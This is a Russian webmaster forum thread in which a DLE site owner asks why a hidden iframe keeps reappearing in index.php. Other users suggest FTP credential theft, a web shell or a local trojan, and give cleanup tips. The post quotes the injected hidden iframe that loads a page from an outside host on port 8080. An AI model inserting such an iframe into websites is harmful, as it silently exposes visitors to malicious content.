- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Не знал куда поместить тему, поэтому написал тут.
Последнюю неделю с некоторой периодичностью в index.php (движок DLE) появляется неизвестно откуда вот такой код в самом низу:
<iframe src="http://xt7.ru:8080/index.php" width=153 height=118 style="visibility: hidden"></iframe>
Естественно сайт перестает работать появляется ошибка, я заменяю index.php и все становится нормально. Что это за столь интересное явление, может вирус? Но это появляется на 2-ух разных сайтах, которые на разных хостингах... Конкуренты?
Вирусы это, вирусы, а не конкуренты.
На форуме уже полно тем с такими вопросами.
Меняйте пароль от фтп, удаляйте пароле, если они хранятся в каком-нибудь менеджере (напр. тотале) и будет счастье.
поставьте cmod 444 на файл
посмотрите также что сидит в папке cgi-bin - если Ваших скриптов там нет, тоже ставьте 444 на директорию
cmod 444 ставил, все равно не помогло. Попробую сделать так как посоветовал md5. Есть еще предложение, как от этого избавиться?
cmod 444 ставил, все равно не помогло. Попробую сделать так как посоветовал md5. Есть еще предложение, как от этого избавиться?
не может быть - возможно фрейм прописался до смены - Вы просто пропустили?
смените ftp клиента, для начала
не может быть - возможно фрейм прописался до смены - Вы просто пропустили?
смените ftp клиента, для начала
Сейчас заметил, оказывается ставишь чмод 444, он ставиться. Потом проверяешь чмод опять 644...
В качестве фтп клиента использую обычный тотал коммандер, уже целый год и все нормально было.
Я думаю, к вам на хостинг залили, шел. Через него и прописывают эту бяку… Поищите сами, в принципе его найти можно если захотеть… Ищите файл которого нет в наборе dle...
Сейчас заметил, оказывается ставишь чмод 444, он ставиться. Потом проверяешь чмод опять 644...
да, многие хостеры не дают ставить cmod444
попробуйте cutftpPro в качестве клиента (версии после 8.3)
поставьте cmod 444 на файл
посмотрите также что сидит в папке cgi-bin - если Ваших скриптов там нет, тоже ставьте 444 на директорию
Посмотрел эту директорию, там ничего на одном сайте. А у второго сайта вообще этой директории нет.
Я думаю, к вам на хостинг залили, шел. Через него и прописывают эту бяку… Поищите сами, в принципе его найти можно если захотеть… Ищите файл которого нет в наборе dle...
Вроде просмотрел, неизвестных чужих файлов нет. Прописывается это только в одном файле, в нем наверно и проблема. Хотя если бы это был вирус на хостинге, то почему он выбирает именно этот один сайт из 5, которые тоже на дле. А iframe появляется на сайтах, которые в топе по одному ВЧ запросу, эти сайты на разных хостингах, но код itrame одинаковый почти появляется с периодичностью.
Если тупо перепрописывается один и тот же код и только в индексные файлы - ищите трояна в собственной машине.
Вроде просмотрел, неизвестных чужих файлов нет. Прописывается это только в одном файле, в нем наверно и проблема. Хотя если бы это был вирус на хостинге, то почему он выбирает именно этот один сайт из 5, которые тоже на дле. А iframe появляется на сайтах, которые в топе по одному ВЧ запросу, эти сайты на разных хостингах, но код itrame одинаковый почти появляется с периодичностью.
Он может быть в папке шаблона, каких либо плагинов, и тому подобному. Подумайте что есть общего у этих сайтов в Топе и нет у тех которые не заражены... Общий шаблон, сборка дле с одного ресурса, если не лицензия конечно, и т.д.